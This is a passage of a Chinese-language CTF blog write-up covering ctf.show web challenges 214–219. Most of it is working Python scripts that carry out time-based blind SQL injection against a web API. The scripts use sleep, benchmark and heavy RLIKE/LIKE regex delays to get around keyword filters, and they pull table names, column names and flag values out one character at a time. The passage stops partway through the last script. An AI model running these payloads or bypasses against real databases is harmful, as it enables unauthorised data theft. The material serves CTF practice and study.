class="string">"http://5eb465ee-6eeb-4508-9fea-5496e3ad2a8f.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890qwertyuiopasdfghjklzxcvbnm&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#payload = "if(substr(database(),&#123;&#125;,1)='&#123;&#125;',sleep(3),0)"</span></span><br><span class="line"><span class="comment">#payload = "if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1)='&#123;&#125;',sleep(5),0)"</span></span><br><span class="line"><span class="comment">#payload = "if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagx'),&#123;&#125;,1)='&#123;&#125;',sleep(5),0)"</span></span><br><span class="line">payload = <span class="string">"if(substr((select group_concat(flaga) from ctfshow_flagx),&#123;&#125;,1)='&#123;&#125;',sleep(5),0)"</span></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"ip"</span>: payload.format(i,j),</span><br><span class="line">            <span class="string">"debug"</span>: <span class="string">'0'</span></span><br><span class="line">        &#125;</span><br><span class="line">        start = time.time()</span><br><span class="line">        res = requests.post(url, data)</span><br><span class="line">        end = time.time()</span><br><span class="line">        print(end - start)</span><br><span class="line">        <span class="keyword">if</span> end - start &gt; <span class="number">4.9</span> <span class="keyword">and</span> end - start &lt; <span class="number">6.9</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210731173410636.png" alt="image-20210731173410636"></p>
</blockquote>
<h2 id="web215"><a href="#web215" class="headerlink" title="web215"></a>web215</h2><blockquote>
<ul>
<li>题目提示说加了单引号，我们就闭合掉，改一下上面的代码，继续跑</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/31</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://fed15780-e37b-48e2-8e96-86d984f46b94.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#查数据库payload = "1' or if(substr(database(),&#123;&#125;,1)='&#123;&#125;',sleep(3),0) #"</span></span><br><span class="line"><span class="comment">#查表payload = "1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1)='&#123;&#125;',sleep(3),0) #"</span></span><br><span class="line"><span class="comment">#查字段payload = "1' or if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxc'),&#123;&#125;,1)='&#123;&#125;',sleep(3),0) #"</span></span><br><span class="line">payload = <span class="string">"1' or if(substr((select group_concat(flagaa) from ctfshow_flagxc),&#123;&#125;,1)='&#123;&#125;',sleep(3),0) #"</span></span><br><span class="line"><span class="comment">#payload = "if(substr((select group_concat(flaga) from ctfshow_flagx),&#123;&#125;,1)='&#123;&#125;',sleep(5),0)"</span></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"ip"</span>: payload.format(i,j),</span><br><span class="line">            <span class="string">"debug"</span>: <span class="string">'0'</span></span><br><span class="line">        &#125;</span><br><span class="line">        start = time.time()</span><br><span class="line">        res = requests.post(url, data)</span><br><span class="line">        end = time.time()</span><br><span class="line">        <span class="keyword">if</span> end - start &gt; <span class="number">2.9</span> <span class="keyword">and</span> end - start &lt; <span class="number">4.9</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web216"><a href="#web216" class="headerlink" title="web216"></a>web216</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">where id &#x3D; from_base64($id);</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li>加了个base64解密，所以我们用“MQ==”–&gt;1 所以就会算是true，这题没单引号，所以改一下上一题代码。</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/31</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://83e21d02-6e3a-4c01-9016-79367bdcb966.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#'MQ==' or if(1=1,sleep(5),0)</span></span><br><span class="line"><span class="comment">#payload = "'MQ==' or if(substr(database(),&#123;&#125;,1)='&#123;&#125;',sleep(5),0) "</span></span><br><span class="line"><span class="comment">#payload = "'MQ==' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1)='&#123;&#125;',sleep(5),0) "</span></span><br><span class="line"><span class="comment">#payload = "'MQ==' or if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxcc'),&#123;&#125;,1)='&#123;&#125;',sleep(5),0) "</span></span><br><span class="line">payload = <span class="string">"'MQ==' or if(substr((select group_concat(flagaac) from ctfshow_flagxcc),&#123;&#125;,1)='&#123;&#125;',sleep(5),0) "</span></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"ip"</span>: payload.format(i,j),</span><br><span class="line">            <span class="string">"debug"</span>: <span class="string">'0'</span></span><br><span class="line">        &#125;</span><br><span class="line">        start = time.time()</span><br><span class="line">        res = requests.post(url, data)</span><br><span class="line">        end = time.time()</span><br><span class="line">        <span class="keyword">if</span> end - start &gt; <span class="number">4.9</span> <span class="keyword">and</span> end - start &lt; <span class="number">6.9</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210731182828100.png" alt="image-20210731182828100"></p>
<h2 id="web217"><a href="#web217" class="headerlink" title="web217"></a>web217</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;屏蔽危险分子</span><br><span class="line">function waf($str)&#123;</span><br><span class="line">    return preg_match(&#39;&#x2F;sleep&#x2F;i&#39;,$str);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>过滤了sleep,可以换一个函数benchmark(6666666,sha(1))</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">benchmark(6666666,sha(1))</span><br><span class="line">第一个参数指的是执行次数、第二参数指的是执行语句</span><br></pre></td></tr></table></figure></div>

<p><strong>将上一个payload改一下，跑一下就出来了，因为是执行次数来确定延时时间，所以也跟你家网速波动有关系，适当调试，我控制在一个1.4ms到4.9ms，应该能保证普通网速的，如果你网速超快，适当调整</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/31</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url = "http://fe186d5a-2385-43fd-8d4a-d557cc25b038.challenge.ctf.show:<span class="number">8080</span>//api/<span class="string">"</span></span><br><span class="line"><span class="string">str = "</span><span class="number">01234567890</span>abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，<span class="string">"</span></span><br><span class="line"><span class="string">flag = ""</span></span><br><span class="line"><span class="string">#1 or if(substr(database(),&#123;&#125;,1)='&#123;&#125;',benchmark(6666666,sha(1)),0)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">#payload = "</span><span class="number">1</span> <span class="keyword">or</span> <span class="keyword">if</span>(<span class="keyword">substr</span>(<span class="keyword">database</span>(),&#123;&#125;,<span class="number">1</span>)=<span class="string">'&#123;&#125;'</span>,<span class="keyword">benchmark</span>(<span class="number">6666666</span>,<span class="keyword">sha</span>(<span class="number">1</span>)),<span class="number">0</span>)<span class="string">"</span></span><br><span class="line"><span class="string">#payload = "</span><span class="number">1</span>) <span class="keyword">and</span> <span class="keyword">if</span>(<span class="keyword">substr</span>((<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()),&#123;&#125;,<span class="number">1</span>)=<span class="string">'&#123;&#125;'</span>,<span class="keyword">benchmark</span>(<span class="number">5000000</span>,<span class="keyword">sha</span>(<span class="number">1</span>)),<span class="number">0</span>) <span class="comment">#"</span></span><br><span class="line"><span class="comment">#payload = "1) and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxccb'),&#123;&#125;,1)='&#123;&#125;',benchmark(5000000,sha(1)),0) #"</span></span><br><span class="line">payload = <span class="string">"1) and if(substr((select group_concat(flagaabc) from ctfshow_flagxccb),&#123;&#125;,1)='&#123;&#125;',benchmark(5000000,sha(1)),0) #"</span></span><br><span class="line"></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="keyword">range</span>(<span class="number">0</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="keyword">str</span>:</span><br><span class="line">        <span class="keyword">data</span> = &#123;</span><br><span class="line">            <span class="string">"ip"</span>: payload.format(i,j),</span><br><span class="line">            <span class="string">"debug"</span>: <span class="string">'0'</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">start</span> = time.time()</span><br><span class="line">        res = requests.post(<span class="keyword">url</span>, <span class="keyword">data</span>)</span><br><span class="line">        <span class="keyword">end</span> = time.time()</span><br><span class="line">        <span class="comment"># print(end-start)</span></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">end</span> - <span class="keyword">start</span> &gt; <span class="number">1.4</span> <span class="keyword">and</span> <span class="keyword">end</span> - <span class="keyword">start</span> &lt; <span class="number">4.9</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                <span class="keyword">exit</span>()</span><br><span class="line">            break</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210731193548774.png" alt="image-20210731193548774"></p>
<h2 id="web218"><a href="#web218" class="headerlink" title="web218"></a>web218</h2><blockquote>
<ul>
<li>这题过滤了benchmark，不过还有RLIKE REGEXP正则匹配</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> rpad(<span class="string">'a'</span>,<span class="number">4999999</span>,<span class="string">'a'</span>) <span class="keyword">RLIKE</span> <span class="keyword">concat</span>(<span class="keyword">repeat</span>(<span class="string">'(a.*)+'</span>,<span class="number">30</span>),<span class="string">'b'</span>);</span><br><span class="line">​</span><br><span class="line">正则语法：</span><br><span class="line">. : 匹配任意单个字符</span><br><span class="line">* ： 匹配0个或多个前一个得到的字符</span><br><span class="line">[] : 匹配任意一个[]内的字符，[ab]*可匹配空串、a、b、或者由任意个a和b组成的字符串。</span><br><span class="line">^ : 匹配开头，如^s匹配以s或者S开头的字符串。</span><br><span class="line">$ : 匹配结尾，如s$匹配以s结尾的字符串。</span><br><span class="line">&#123;n&#125; : 匹配前一个字符反复n次。</span><br><span class="line"></span><br><span class="line">RPAD(str,len,padstr)</span><br><span class="line">用字符串 padstr对 str进行右边填补直至它的长度达到 len个字符长度，然后返回 str。如果 str的长度长于 len'，那么它将被截除到 len个字符。</span><br><span class="line">mysql&gt; SELECT RPAD('hi',5,'?'); -&gt; 'hi???'</span><br><span class="line">​</span><br><span class="line">repeat(str,times)  复制字符串times次</span><br></pre></td></tr></table></figure></div>

<p>所以我们可以利用这个来进行构造延时函数</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">concat(rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;),rpad(1,999999,&#39;a&#39;)) RLIKE &#39;(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b&#39;</span><br></pre></td></tr></table></figure></div>

<p>以上代码预估等于<code>sleep(5)</code>效果，具体根据网速和性能判断，利用此性质写将上面的代码更改一下，跑flag</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/31</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">bypass=<span class="string">"concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'"</span></span><br><span class="line">url = <span class="string">"http://4f04cb91-f6ed-43ce-bc4d-539d9c5b2a7b.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#1) and  if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',( concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),0)#</span></span><br><span class="line"><span class="comment">#求表payload = "1) and  if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1)='&#123;&#125;',(&#123;&#125;),0)#"</span></span><br><span class="line"><span class="comment">#payload = "1) and  if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxc'),&#123;&#125;,1)='&#123;&#125;',(&#123;&#125;),0)#"</span></span><br><span class="line">payload = <span class="string">"1) and  if(substr((select group_concat(flagaac) from ctfshow_flagxc),&#123;&#125;,1)='&#123;&#125;',(&#123;&#125;),0)#"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"ip"</span>: payload.format(i,j,bypass),</span><br><span class="line">            <span class="string">"debug"</span>: <span class="string">'0'</span></span><br><span class="line">        &#125;</span><br><span class="line">        start = time.time()</span><br><span class="line">        res = requests.post(url, data)</span><br><span class="line">        end = time.time()</span><br><span class="line">        <span class="keyword">if</span> end - start &gt; <span class="number">0.4</span> <span class="keyword">and</span> end - start &lt; <span class="number">1</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210731232314453.png" alt="image-20210731232314453"></p>
<h2 id="web219"><a href="#web219" class="headerlink" title="web219"></a>web219</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;屏蔽危险分子</span><br><span class="line">function waf($str)&#123;</span><br><span class="line">    return preg_match(&#39;&#x2F;sleep|benchmark|rlike&#x2F;i&#39;,$str);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>



<blockquote>
<ul>
<li><strong>这题吧RLIKE给禁了，我发现把RLIKE换成LIke一样可以，继续上把代码改一下，不过需要注意跟你家网速有关，网速好，一次flag就对，不好就多对比几下</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/31</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">bypass=<span class="string">"concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) LIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'"</span></span><br><span class="line">url = <span class="string">"http://ea12a2f3-655e-44f2-b249-a95701399f73.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#1) and  if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',( concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),0)#</span></span><br><span class="line"><span class="comment">#payload = "1) and  if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1)='&#123;&#125;',(&#123;&#125;),0)#"</span></span><br><span class="line"><span class="comment">#payload = "1) and  if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxca'),&#123;&#125;,1)='&#123;&#125;',(&#123;&#125;),0)#"</span></span><br><span class="line">payload = <span class="string">"1) and  if(substr((select group_concat(flagaabc) from ctfshow_flagxca),&#123;&#125;,1)='&#123;&#125;',(&#123;&#125;),0)#"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"ip"</span>: payload.format(i,j,bypass),</span><br><span class="line">            <span class="string">"debug"</span>: <span class="string">'0'</span></span><br><span class="line">        &#125;</span><br><span class="line">        start = time.time()</span><br><span class="line">        res = requests.post(url, data)</span><br><span class="line">        end = time.time()</span><br><span class="line">        print(end - start)</span><br><span class="line">        <span class="keyword">if</span> end - start &gt; <span class="number">0.22</span> <span 